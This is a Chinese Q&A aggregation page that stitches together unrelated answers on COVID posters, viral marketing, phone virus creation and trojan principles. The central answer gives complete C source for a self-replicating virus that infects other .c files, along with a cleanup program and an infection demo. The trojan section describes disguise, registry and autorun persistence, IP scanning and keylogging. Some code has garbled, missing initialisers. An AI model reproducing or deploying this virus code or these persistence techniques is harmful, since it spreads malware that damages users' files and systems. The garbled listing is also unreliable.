当前位置:首页 » 文件管理 » 怎样打造病毒内容
扩展阅读
可以驯化动物原始人游戏 2025-05-18 04:06:20
qq里可以打字的图片 2025-05-18 03:53:44

怎样打造病毒内容

发布时间: 2022-10-10 11:28:33

‘壹’ 新型冠状病毒手抄报文字内容

一、认识新型冠状病毒

‘贰’ 怎样编写病毒

3.1.1病毒程序VIRUS.C
这是一个用C语言写的病毒程序,当激发病毒程序时显示时间,然后返回。病毒程序VIRUS.C可将病毒传染给一个C语言程序。当被病毒感染的程序经编译、连接和执行后,又可以将病毒部分传染给其他的C语言源程序。每执行一次带有病毒的C语言程序,就向C语言源程序传播一次病毒。此程序的设计思路如下:
当含有病毒部分的程序被执行时,首先进入病毒程序。它在磁盘上找扩展名为C的匹配文件,如果找到,查找是否有被传染过的标志“INFECTED”。如果有此标志,继续找其它的C文件,直至全部检查一遍。若没有这个标志,则
(1)在未被感染的C程序头部加入“INFECTED”已被传染标志。
(2)读取病毒文件的头文件,将其插入到即将被感染的文件头部。如果发现有重复则不插入。
(3)在主程序中插入“VIRUSES();”调用VIRUSES函数。寻找printf、for、while、break语句,如果找到就在之前插入。
(4)在文件尾部插入VIRUSES_SUB子程序。
(5)在插入到将感染文件里面的VIRUSES_SUB子程序里面,必须把文件名改为当前自身的文件名,否则被传染后的文件经过编译、连接和运行后不能再继续传染。
(6)最后插入VIRUSES子程序。这个子程序里面调用了VIRUSES_SUB,执行到这里返回执行结果信息。
其中用到4个出错的返回值,分别是:
1:用户文件太大,不传染;
2:带病毒文件打不开,不传染;
3:带病毒文件读取不成功,不传染;
4:查找第一个匹配文件不成功。
如果返回值是0代表文件传染成功。
具体实现过程如下:
其中用到的函数和结构体用法参考3.3节。
首先导入病毒子程序要用到的三个库文件,分别是dir.h, stido.h, dos.h.在主函数里面只调用VIRUSES函数。紧跟定义VIRUSES函数里面要调用的VIURS_SUB函数。里面定义了若干个变量。ffblk用来保存查找到的匹配文件的信息,用到里面的ff_name变量来保存匹配文件名。
然后定义保存未感染的文件和病毒文件的文件型指针变量,分别用是*virus_r和*virus_v.读取文件的缓冲区,放到二维数组a[500][80]里面临时存放。因为此程序对大于500行的C文件不进行传染,所以完全可以放到里面。首先用getdate函数获取系统当前日期并输出。接着用findfirst函数查找扩展名为C的文件,将其信息保存到ffblk里面。用fgets函数读文件的第一行,长度是80-1个字符。然后用strstr函数检测病毒的标志,看文件是否有INFECT这个标志。
如果有,表示文件已经被传染,关闭文件,不进行传染。当含有病毒部分的程序被执行时,首先进入病毒程序。它在磁盘上查找*.C的匹配文件,一旦找到,查找“已被传染过”的标志INFECTED。若有此标志,继续找其它*.C文件,直至全部检查一遍。
如果没有这个标志,将文件全部读入a[500][80],如果发现文件超过500行,不传染,返回。将文件指针指向文件头,打开带病毒的文件。如果打不开,返回。
然后读取带病毒文件的前4行,也就是病毒子程序要用到的头文件,写入将被传染的文件。若不能读取带病毒文件,返回。用n_line变量控制行数,把将被传染文件的源程序写回原文件。其中要进行处理不写入病毒文件已有的包含语句,也就是说使#Include语句不重复。
这点是这样实现的:定义一个字符数组char include_h[]=; strstr函数查看将被传染文件的头文件是否和*include_h[]相同,如果相同,不进行插入。找出CALL VIRUSES;的插入点:如果有一行有printf、break、for、while语句其中之一,就对其后插入调用VIRUSES函数的调用语句。把病毒子程序写入文件。最后处理更改被感染的文件名。如果不进行改名,就不能进行多次传染,也就是说不能体现病毒的自我复制能力。查找一行是static char viruses_f[]=,把其中的文件名改为被感染的文件名。接着查找下一个匹配文件。
3.1.2病毒清除程序REVIURS.C
病毒的清除过程是和传染过程相逆的。传染的时候插入调用viruses函数的调用语句,在病毒清除文件里面就要删除掉这个语句。然后还要删除掉病毒子程序VIURSES_SUB和VIURSES。有一个问题不能进行还原。因为当时插入病毒子程序需要的头文件时没有记录传染前文件的头文件信息,所以不能进行还原。但是这一点不影响原文件。所以这点在病毒清除程序中没有进行处理。
由于演示的时候病毒程序VIRUS.C和清除病毒程序REVIURS.C放在同一个目录下进行演示。考虑到VIRUS.C会把REVIURS.C传染和REVIRUS.C会把VIRUS.C清除两种情况。所以编写这两个程序的时候必须加入一条条件语句if(strcmp(ffblk.ff_name,"REVIRUS.C")!=0)和if(strcmp(ffblk.ff_name,"VIRUS.C")!=0)。
当含有清除部分的程序被执行时。它在磁盘上找扩展名为C的匹配文件,如果找到,查找是否有被传染过的标志“INFECTED”。如果无此标志,继续找其它的C文件,直至全部检查一遍。若有这个标志,则
(1)查找磁盘文件,如果是有病毒的传染标志“INFECTED”则打开文件。如果没有则关闭文件并且寻找下一个TEST*.C。
(2)读取文件,首先判断是否为Viruses();如果不是则判断是否为int Viruses_sub(),如果都不是,则把读取部分放在二维数组a[500][80]中,如果只是为int Viruses_sub(),则读取文件结束。
(3)关闭文件,然后删除该文件。
(4)创建一个跟删除文件相同名字的文件。然后打开。
(5)把二维数组a[500][80]中的数据写入到新建的文件中。关闭文件,读取下一个文件。

3.2 程序流程图
3.2.1 病毒程序VIRUS.C流程图

N
N
Y Y





Y
N

3.2.2 解毒程序REVIRUS.C流程图

N

Y




Y

N
Y

N

3.3其中用到的函数和结构体的说明:
(1)结构体struct ffblk (在dir.h中)类型变量
变量ffblk用于打开文件,获取返回值。
Struct ffblk
{char ff_reserved[21];
char ff_attrib;
unsigned ff_ftime;
unsigned ff_fdate;
long ff_fize;
char ff_name[13];
};
程序中只用到ff_name来保存匹配文件名。
(2)结构体struct date(在dos.h中)变量
struct date
{int da_year; /* Year-1980 */
char da_day; /* Day of the month */
char da_mon; /* Month (1=Jan) */
};
程序中用来获取系统当前日期。具体用法为:
void getdate (struct date *datep);
(3)查找匹配文件
findfirst()函数和findnext()函数
调用方式:整型数=findfirst(文件名,&结构变量名,属性常数组合(如0×24));
功能:检索由path和attr指定的文件,把结果返回到afer。
Findfirst返回关于第一个指定文件的信息。
Findnext继续检索。
返回值:0(检索成功),-1(没有找到指定的文件)
属性常数:
FA_NORMAL(0*00) 含意:Normal file, no attributes
FA_RDONLY (0*01) 含意:只读
FA_HIDDEN(0*02) 含意:隐含文件
FA_SYSTEM(0*24) 含意:系统文件
需要用到的头文件: dir.h
程序中的匹配文件属于普通文件,所以属性常数为0。
(4)读文件
函数原形:char *fgets (char *a, int n, FILE *fp);
功能:
从fp指向的文件读取一个长度为(n-1)的字符串,最后加一个’ \0’,存入始地址为a的空间。
若在读完n-1个字符之前遇到换行符或EOF,读入即结束。
返回值:返回地址a。
若遇文件结束或出错,返回NULL。
(5)在字符串中查找指定字符串的第一次出现
函数原形;
char *strstr(char *str1,char *str2);
功能:找出str2字符串在str1字符串中第一次出现的位置(不包括str2的串结束符)。
返回值:返回该位置的指针。
若找不到,返回NULL指针。
程序中用这个函数来判断字符串是否一致。
(6)改变文件位置指针
函数原形:int fseek (FILE *fp, long offset, int base);
功能:将fp所指文件的位置指针移到以base所指出的位置为基准、以offset为位移量的位置。
返回值:返回当前位置。否则,返回-1。SEEK_SET为文件开始。
由于读取文件的时候文件指针要发生变化。而重新执行一条命令的时候需要重新定位文件指针的位置,所以要用到fseek函数。程序中用这个函数定位到文件头,对文件进行重新读取。
3.4 程序清单
3.4.1病毒程序VIRUS.C程序清单如下:
/*INFECTED*/
#include "stdio.h"
#include "dos.h"
#include "dir.h"
main()
{
viruses();
}
int viruses_sub()
{
struct ffblk ffblk;
int done,i,j,k,n_line;
FILE *virus_r,*virus_v;
/*virus_r指向将被感染的文件,virus_v指向已带病毒的文件*/
char a[500][80],b[80],*p1,*p2; /*将被传染的文件读入a[500][80]临时存放*/
static char viruses_f[]=;/*文件被传染后,修改该值为自身文件名*/
int include_write;
int virus_call=0;
int virus_start=0;
char *main_flag[]=;
char *include_h[]=;
char *v_flag[]=;
struct date today;
/*VIRUSES DISPLAY*/
getdate(&today); /*病毒显示日期信息*/
printf("Today is %d/%d/%d\n",today.da_mon,today.da_day,today.da_year);
/*AFFECT VIRUSES*/
done=findfirst("*.c",&ffblk,0); /*查找第一个匹配文件*/
while(!done)
{
if(strcmp(ffblk.ff_name,"REVIRUS.C")!=0)
{
virus_r=fopen(ffblk.ff_name,"r+w");
if(virus_r!=NULL)
{
p1=fgets(&a[0][0],80,virus_r);
if(strstr(p1,v_flag[0])==NULL)
{
n_line=0; /*把文件全部读入a[500][80]*/
while(p1!=NULL)
{
n_line++;
p1=fgets(&a[n_line][0],80,virus_r);
if(n_line>=500)
{
fclose(virus_r);
return(1);
}
}
fseek(virus_r,0,SEEK_SET);
virus_v=fopen(&viruses_f[0],"r"); /*打开带病毒的文件*/
if(virus_v==NULL)
{
fclose(virus_r);
return(2);
}
for(i=1;i<5;i++) /*读带病毒文件前4行并写入将被传染的文件*/
{
p2=fgets(b,80,virus_v);
if(p2==NULL)
{
fclose(virus_r);
fclose(virus_v);
return(3);
}
fputs(b,virus_r);
}
for(j=0;j<n_line;j++) /*把将被传染文件的原程序写回原文件*/
{
include_write=1; /*不写入病毒文件已有的包含语句*/
if(strstr(&a[j][0],"#include")!=NULL)
for(i=0;i<3;i++)
if(strstr(&a[j][0],include_h[i])!=NULL)
include_write=-1;
if(virus_call==0) /*插入调用语句,并加上回车换行*/
for(i=0;i<4;i++)
if(strstr(&a[j][0],main_flag[i])!=NULL)
{
for(k=0;k<80;k++)
b[k]=0;
strcpy(&b[0],"viruses();");
b[10]=13;
b[11]=10;
fputs(b,virus_r);virus_call=1;
i=4;
}
if(include_write==1)fputs(&a[j][0],virus_r);
}
p1=fgets(b,80,virus_v); /*把病毒子程序写入文件*/
while(p1!=NULL)
{
if(virus_start==0) /*找病毒子程序的第一条语句*/
if(strstr(p1,"int viruses_sub()")!=NULL)
virus_start=1;
if(virus_start==1)
{
if(strstr(p1,"char")!=NULL)
if(strstr(p1,"viruses_f[]=")!=NULL)
{
strcpy(&b[29],ffblk.ff_name);
i=strlen(&b[0]);
b[i]=34;
strcpy(&b[i+1],");");
b[i+3]=13;
b[i+4]=10;
}
fputs(b,virus_r);
}
p1=fgets(b,80,virus_v);
}
fclose(virus_v);
fclose(virus_r);
return(0);
}
fclose(virus_r);
}
}
done=findnext(&ffblk);
}
return(4);
}

viruses()
{
int num;
num=viruses_sub();
switch (num)
{
case 0 : printf("successful\n");
break;
case 1: printf("the file is outof line\n");
break;
case 2 : printf("the viruses file cannot open\n");
break;
case 3 : printf("cannot read viruses file\n");
break;
case 4: printf("cannot find file\n");
}
getch();
}

3.4.2病毒清除程序REVIURS.C清单如下:
#include "stdio.h"
#include "dos.h"
#include "dir.h"
main()
{
struct ffblk ffblk;
int done,i,j,line,k;
static int n_line;
FILE *virus_r,*virus_v;
char a[500][80],b[80],*p;
char *v_flag[]=;
done=findfirst("*.c",&ffblk,0);
while(!done)
{
if(strcmp(ffblk.ff_name,"VIRUS.C")!=0)
{
for(k=0;k<500;k++)
for(j=0;j<80;j++)
a[k][j]=0;
virus_r=fopen(ffblk.ff_name,"r+w");
if(virus_r!=NULL)
{
p=fgets(&b[0],80,virus_r);

if(strstr(p,v_flag[0])!=NULL)
{
line=0;
while(p!=NULL)
{
p=fgets(&b[0],80,virus_r);
if(strstr(&b[0],"int viruses_sub()")!=NULL)
break;
else if(strstr(&b[0],"viruses();")==NULL)
{
k=strlen(b);
for(j=0;j<k;j++)
a[line][j]=b[j];
a[line][j+1]=0;
line++;
}
}
n_line=line;
fclose(virus_r);
remove(ffblk.ff_name); /*删除文件*/
virus_r=fopen(ffblk.ff_name,"w+"); /*打开将被感染的文件*/
for(i=0;i<n_line;i++)
{
fputs(&a[i][0],virus_r); /*把二维数组中的数据写入原文件*/
}
fclose(virus_r);
}
}
}
done=findnext(&ffblk); /*查找下一个匹配文件*/
}

}

4. 计算机病毒的演示
4.1病毒程序VIRUS.C的演示过程
在一张已经格式化的软盘上,除了病毒源程序VIRUS.C和REVIRUS.C外,还有两个尚未被感染的C语言程序TEST1.C和TEST2.C。原始代码分别如下:
TEST1.C:
#include "stdio.h"
main()
{
int i,sum;
for(i=1;i<100;i++)
sum=sum+i;
printf("sum=%d\n",sum);
}
TEST2.C
#include "stdio.h"
main()
{
printf("hello,world!\n");
}
在命令提示符下键入dir命令查看文件信息。

然后编译连接并执行VIRUS.C文件,运行结果显示:
Today is 5/20/2004
Successful
说明传染成功。再用dir命令查看文件信息

可以看到TEST2.C文件已经被传染,大小从64变成3949。用type命令查看TEST1的内容

可以看到病毒的子程序已经插入了,而且在主函数里面插入了调用VIRUSES函数语句。而且文件名自动改为“TEST2.C”。(如图中红线所示)
然后再把TEST2.C文件编译连接并运行。成功后,再用dir命令查看文件信息

可以看到TEST1.C也被感染了,大小从107变成了3969。再用type命令查看,结果如下:

可以看到,文件名称已经自动改为TEST1.C,而且病毒子程序已经拷贝过来,在这个过程中REVIRUS.C始终没有被感染,达到了我们的目的。
文件被感染前后内容如下图所示:

4.2病毒清除程序REVIRUS.C演示过程
然后我们来演示病毒的清除。编译运行REVIRUS.C后用dir命令查看文件信息。

图中可以看到TEST1.C和TEST2.C都变小了。虽然没有还原到以前的大小。这是因为运行病毒子程序需要的头文件没有删除,原因前面已经提及过了。然后用type命令分别查看一下TEST1.C和TEST2.C的内容。

图中可以看到,除了程序需要用到的头文件,剩下的已经基本还原。而且没有清除VIRUS.C里面的程序,基本达到了清除病毒的目的。演示成功。
从演示过程中可以看出,一旦程序被病毒感染,这个程序经过编译连接后运行时就能向没感染上病毒的程序扩散病毒,使病毒在系统中不断蔓延下去。而病毒清除程序运行一次就可以删除掉所有的病毒子程序和插入的调用语句。

‘叁’ 如何编制手机病毒

您好:

建议您不要编制手机病毒,编制手机病毒会对您和别人的手机造成损害的,如果您曾使用过此类不安全的病毒软件的话,为了您手机的安全,建议您使用腾讯手机管家对您的手机杀毒吧,首先需要您安装腾讯手机管家到手机,您可以使用usb数据线将手机连接到电脑,然后打开腾讯电脑管家的软件管理,在软件管理里面搜索腾讯手机管家,然后选择腾讯手机管家后一键下载安装到手机就可以,安装好以后打开腾讯手机管家的安全防护,然后选择病毒查杀后一键杀毒就可以。

腾讯电脑管家企业平台:http://..com/c/guanjia/

‘肆’ 病毒营销如何做

做病毒营销前首先要了解什么是病毒式营销,病毒式的营销是指发起人发出产品的最初信息到用户,再依靠用户自发的口碑宣传,由于他的原理跟病毒的传播类试,经济学上称之为病毒试营销,是一种常用的网络营销方法,常用于进行网站推广、品牌推广等,病毒式营销利用的是用户口碑传播的原理,在互联网上,这种“口碑传播”更为方便,可以像病毒一样迅速蔓延,因此病毒式营销成为一种高效的信息传播方式,而且,由于这种传播是用户之间自发进行的,因此几乎是不需要费用的网络营销手段。简单的说就和传说中的一传十,十传百的性质是一样的。病毒性营销目前已成为网络营销中网站推广方式之一,并且被很多网站尝试使用。
做病毒营销需要了解的几点:
一、作为病毒性营销有几个基本特性
1、是提供有价值的内容,这是病毒式营销的最基本前提;
2、是要有适宜的传播途径,可以非常便捷地自动传播,象电子书等就是非常好的载体,可以吸引网民大量下载和传播。
3、是可以巧妙地调动公众的积极性,比如象时代营销网的电子书,对很多下载网站来说都是非常好的内容,自然可以大量吸引各种网站作为资源来提供下载,这样才能形成病毒式传播的要素。 病毒性营销作为一种较好的网站推广方式,目前已被大家逐步接受和认可,但要良好地执行,还需要非常巧妙的策划和构思。
二、病毒试营销的几种常见方法
1、免费的服务
一些大型的网站或公司会提供免费的二机域名,免费空间,免费程序接口,免费计数器等资源,这些资源中可以直接或间接的加入公司的连接或者其他产品的介绍,也还可以是广告。特别是现在推出的窄告,很适合放在这些免费资源中。由于这些服务都是免费的,对用户有着很大的吸引力,另外,当用户自己在使用并对外宣传的时候,就也为提供该服务的公司做了免费宣传。
2、便名服务
便名服务服务不象上面的免费服务一样需要一定的财力物力,比较适合小公司或个人网站。在网站上提供日常生活中常会用到的一些查询,如:公交查询,电话查询,手机归属地查询,天气查询等,把这些实用的查询集中到一起,能给用户提供极大的便利,会得到用户很好的口碑,也就能很快的在网名中推广开来。
3、节日祝福
每当到节日时,可以通过QQ,MSM,E-MAIL等工具想朋友发送一些祝福,后面跟上网页地址或精美图片,由于节日里,大家都很高兴收到来自朋友的祝福和喜欢发祝福给朋友,一个病毒连就这样形成了。
4、精美网页或笑话
娱乐是人生活的追求,不管谁定下什么目标,但最终是为了生活、娱乐,做一个精美的网页或精彩的笑话发给朋友,朋友一定回很高兴很会很快的发送给他的好朋友。
三、想做到病毒式的营销效果,唯有做好内容。只有内容有趣、吸引人,传播性才强,才会让网民自发帮你分享和传播,不用推就被传的内容就想病毒,自发扩散。就内容而言,视频是最好的方式,所以现在都说病毒视频营销是趋势。但是门槛比较高,创意很重要。另外要自己会拍,会推,千万不要找那种只拍不会推的影视公司,只会推不会拍的也不靠谱。所以做的人还不多。
四、病毒试营销注意事项
1、不要直接发纯商业广告
2、产品要实用
3、不要欺骗用户
4、做好人工服务

‘伍’ 病毒的编写是用的什么原理

在计算机领域中,它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。

所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。

所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。

从木马的发展来看,基本上可以分为两个阶段。

最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识。

而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。

所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言。

二、木马原理
[编辑本段]

鉴于木马的巨大危害性,我们将分原理篇,防御与反击篇,资料篇三部分来详细介绍木马,希望大家对特洛伊木马这种攻击手段有一个透彻的了解。

【一、基础知识 】

在介绍木马的原理之前有一些木马构成的基础知识我们要事先加以说明,因为下面有很多地方会提到这些内容。

一个完整的木马系统由硬件部分,软件部分和具体连接部分组成。

(1)硬件部分:建立木马连接所必须的硬件实体。 控制端:对服务端进行远程控制的一方。 服务端:被控制端远程控制的一方。 INTERNET:控制端对服务端进行远程控制,数据传输的网络载体。

(2)软件部分:实现远程控制所必须的软件程序。 控制端程序:控制端用以远程控制服务端的程序。 木马程序:潜入服务端内部,获取其操作权限的程序。 木马配置程序:设置木马程序的端口号,触发条件,木马名称等,使其在服务端藏得更隐蔽的程序。

(3)具体连接部分:通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。 控制端IP,服务端IP:即控制端,服务端的网络地址,也是木马进行数据传输的目的地。 控制端端口,木马端口:即控制端,服务端的数据入口,通过这个入口,数据可直达控制端程序或木马 程序。
用木马这种黑客工具进行网络入侵,从过程上看大致可分为六步(具体可见下图),下面我们就按这六步来详细阐述木马的攻击原理。

一.配置木马

一般来说一个设计成熟的木马都有木马配置程序,从具体的配置内容看,主要是为了实现以下两方 面功能:

(1)木马伪装:木马配置程序为了在服务端尽可能的好的隐藏木马,会采用多种伪装手段,如修改图标 ,捆绑文件,定制端口,自我销毁等,我们将在“传播木马”这一节中详细介绍。

(2)信息反馈:木马配置程序将就信息反馈的方式或地址进行设置,如设置信息反馈的邮件地址,IRC号 ,ICO号等等,具体的我们将在“信息反馈”这一节中详细介绍。

【二、传播木马】.

(1)传播方式:

木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出 去, 收信人只要打开附件系统就会感染木马;另一种是软件下载,一些非正规的网站以提供软件下载为名义, 将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。

(2)伪装方式:

鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这 是木马设计者所不愿见到的,因此他们开发了多种功能来伪装木马,以达到降低用户警觉,欺骗用户的目的。

(一)修改图标

当你在E-MAIL的附件中看到这个图标时,是否会认为这是个文本文件呢?但是我不得不告 诉你,这也有可能是个木马程序,现在 已经有木马可以将木马服务端程序的图标改成HTML,TXT, ZIP等各种文件的图标,这有相当大的迷 惑性,但是目前提供这种功能的木马还不多见,并且这种 伪装也不是无懈可击的,所以不必整天提心吊胆,疑神疑鬼的。

(二)捆绑文件

这种伪装手段是将木马捆绑到一个安装程序上,当安装程序运行时,木马在用户毫无察觉的 情况下 ,偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE,COM一类的文件)。

(三)出错显示

有一定木马知识的人都知道,如果打开一个文件,没有任何反应,这很可能就是个木马程序, 木马的 设计者也意识到了这个缺陷,所以已经有木马提供了一个叫做出错显示的功能。当服务 端用户打开木 马程序时,会弹出一个如下图所示的错误提示框(这当然是假的),错误内容可自由 定义,大多会定制成 一些诸如“文件已破坏,无法打开的!”之类的信息,当服务端用户信以 为真时,木马却悄悄侵入了 系统。

(四)定制端口

很多老式的木马端口都是固定的,这给判断是否感染了木马带来了方便,只要查一下特定的 端口就 知道感染了什么木马,所以现在很多新式的木马都加入了定制端口的功能,控制端用户可 以在1024---65535之间任选一个端口作为木马端口(一般不选1024以下的端口),这样就给判断 所感染木马类型带 来了麻烦。

(五)自我销毁

这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后,木马 会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),一般来说 原木马文件 和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外),那么中了木马 的朋友只要在近来 收到的信件和下载的软件中找到原木马文件,然后根据原木马的大小去系统 文件夹找相同大小的文件, 判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木 马后,原木马文件将自动销毁,这 样服务端用户就很难找到木马的来源,在没有查杀木马的工 具帮助下,就很难删除木马了。

(六)木马更名

安装到系统文件夹中的木马的文件名一般是固定的,那么只要根据一些查杀木马的文章,按 图索骥在系统文件夹查找特定的文件,就可以断定中了什么木马。所以现在有很多木马都允许控 制端用户自由定制安装后的木马文件名,这样很难判断所感染的木马类型了。

【三.运行木马】

服务端用户运行木马或捆绑木马的程序后,木马就会自动进行安装。首先将自身拷贝到WINDOWS的 系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下),然后在注册表,启动组,非启动组中设置好木马 的触发条件 ,这样木马的安装就完成了。安装后就可以启动木马了,具体过程见下文:

①由自启动激活木马

自启动木马的条件,大致出现在下面6个地方:

1.注册表:打开HKEY_LOCAL_下的五个以Run 和RunServices主键,在其中寻找可能是启动木马的键值。

2.WIN.INI:C:WINDOWS目录下有一个配置文件win.ini,用文本方式打开,在[windows]字段中有启动 命令 load=和run=,在一般情况下是空白的,如果有启动程序,可能是木马。 3.SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini,用文本方式打开,在[386Enh],[mic], [drivers32]中有命令行,在其中寻找木马的启动命令。

4.Autoexec.bat和Config.sys:在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都 需要控制端用户与服务端建立连接后,将已添加木马启动命令的同名 文件上传 到服务端覆盖这两个文件才行。

5.*.INI:即应用程序的启动配置文件,控制端利用这些文件能启动程序的特点,将制作好的带有木马 启动命令的同名文件上传到服务端覆盖这同名文件,这样就可以达到启动木马的目的了。

6.启动菜单:在“开始---程序---启动”选项下也可能有木马的触发条件。

②由触发式激活木马

1.注册表:打开HKEY_CLASSES_ROOT文件类型\shellopencommand主键,查看其键值。举个例子,国产 木马“冰河”就是修改HKEY_CLASSES_ROOT xtfileshellopencommand下的键值,将“C :WINDOWS NOTEPAD.EXE %1”该为“C:WINDOWSSYSTEMSYXXXPLR.EXE %1”,这时你双 击一个TXT文件 后,原本应用NOTEPAD打开文件的,现在却变成启动木马程序了。还要说明 的是不光是TXT文件 ,通过修改HTML,EXE,ZIP等文件的启动命令的键值都可以启动木马 ,不同之处只在于“文件类型”这个主键的差别,TXT是txtfile,ZIP是WINZIP,大家可以 试着去找一下。

2.捆绑文件:实现这种触发条件首先要控制端和服务端已通过木马建立连接,然后控制端用户用工具 软件将木马文件和某一应用程序捆绑在一起,然后上传到服务端覆盖原文件,这样即使 木马被删 除了,只要运行捆绑了木马的应用程序,木马又会被安装上去了。

3.自动播放式:自动播放本是用于光盘的,当插入一个电影光盘到光驱时,系统会自动播放里面的内容,这就是自动播放的本意,播放什么是由光盘中的AutoRun.inf文件指定的,修改AutoRun.inf中的open一行可以指定在自动播放过程中运行的程序。后来有人用于了硬盘与U盘,在U盘或硬盘的分区,创建Autorun.inf文件,并在Open中指定木马程序,这样,当你打开硬盘分区或U盘时,就会触发木马程序的运行。

木马作者还在不断寻找“可乘之机”这里只是举例,又有不断的自启动的地方被挖掘出来。

(2)木马运行过程

木马被激活后,进入内存,并开启事先定义的木马端口,准备与控制端建立连接。这时服务端用 户可以在MS-DOS方式下,键入NETSTAT -AN查看端口状态,一般个人电脑在脱机状态下是不会有端口 开放的,如果有端口开放,你就要注意是否感染木马了。下面是电脑感染木马后,用NETSTAT命令查 看端口的两个实例:

其中①是服务端与控制端建立连接时的显示状态,②是服务端与控制端还未建立连接时的显示状态。

在上网过程中要下载软件,发送信件,网上聊天等必然打开一些端口,下面是一些常用的端口:

(1)1---1024之间的端口:这些端口叫保留端口,是专给一些对外通讯的程序用的,如FTP使用21, SMTP使用25,POP3使用110等。只有很少木马会用保留端口作为木马端口 的。

(2)1025以上的连续端口:在上网浏览网站时,浏览器会打开多个连续的端口下载文字,图片到本地 硬盘上,这些端口都是1025以上的连续端口。

(3)4000端口:这是OICQ的通讯端口。

(4)6667端口:这是IRC的通讯端口。 除上述的端口基本可以排除在外,如发现还有其它端口打开,尤其是数值比较大的端口,那就要怀疑 是否感染了木马,当然如果木马有定制端口的功能,那任何端口都有可能是木马端口。

【四.信息泄露】

一般来说,设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集 一些服务端的软硬件信息,并通过E-MAIL,IRC或ICO的方式告知控制端用户。

从反馈信息中控制端可以知道服务端的一些软硬件信息,包括使用的操作系统,系统目录,硬盘分区况, 系统口令等,在这些信息中,最重要的是服务端IP,因为只有得到这个参数,控制端才能与服务端建立 连接,具体的连接方法我们会在下一节中讲解。

【五.建立连接】

这一节我们讲解一下木马连接是怎样建立的 。一个木马连接的建立首先必须满足两个条件:一是 服务端已安装了木马程序;二是控制端,服务端都要在线 。在此基础上控制端可以通过木马端口与服 务端建立连接。

假设A机为控制端,B机为服务端,对于A机来说要与B机建立连接必须知道B机的木马端口和IP地 址,由于木马端口是A机事先设定的,为已知项,所以最重要的是如何获得B机的IP地址。获得B机的IP 地址的方法主要有两种:信息反馈和IP扫描。对于前一种已在上一节中已经介绍过了,不再赘述,我们 重点来介绍IP扫描,因为B机装有木马程序,所以它的木马端口7626是处于开放状态的,所以现在A机只 要扫描IP地址段中7626端口开放的主机就行了,例如图中B机的IP地址是202.102.47.56,当A机扫描到 这个IP时发现它的7626端口是开放的,那么这个IP就会被添加到列表中,这时A机就可以通过木马的控 制端程序向B机发出连接信号,B机中的木马程序收到信号后立即作出响应,当A机收到响应的信号后, 开启一个随即端口1031与B机的木马端口7626建立连接,到这时一个木马连接才算真正建立。值得一提 的要扫描整个IP地址段显然费时费力,一般来说控制端都是先通过信息反馈获得服务端的IP地址,由于 拨号上网的IP是动态的,即用户每次上网的IP都是不同的,但是这个IP是在一定范围内变动的,如图中 B机的IP是202.102.47.56,那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255,所以 每次控制端只要搜索这个IP地址段就可以找到B机了。

【六.远程控制】

木马连接建立后,控制端端口和木马端口之间将会出现一条通道。

控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系,并通过木马程序对服务端进行远 程控制。下面我们就介绍一下控制端具体能享有哪些控制权限,这远比你想象的要大。

(1)窃取密码:一切以明文的形式,*形式或缓存在CACHE中的密码都能被木马侦测到,此外很多木马还 提供有击键记录功能,它将会记录服务端每次敲击键盘的动作,所以一旦有木马入侵, 密码将很容易被窃取。

(2)文件操作:控制端可借由远程控制对服务端上的文件进行删除,新建,修改,上传,下载,运行,更改属 性等一系列操作,基本涵盖了WINDOWS平台上所有的文件操作功能。

(3)修改注册表:控制端可任意修改服务端注册表,包括删除,新建或修改主键,子键,键值。有了这 项功能控制端就可以禁止服务端软驱,光驱的使用,锁住服务端的注册表,将服务端 上木马的触发条件设置得更隐蔽的一系列高级操作。

(4)系统操作:这项内容包括重启或关闭服务端操作系统,断开服务端网络连接,控制服务端的鼠标, 键盘,监视服务端桌面操作,查看服务端进程等,控制端甚至可以随时给服务端发送信息,想象一下,当服务端的桌面上突然跳出一段话,不吓人一跳才怪

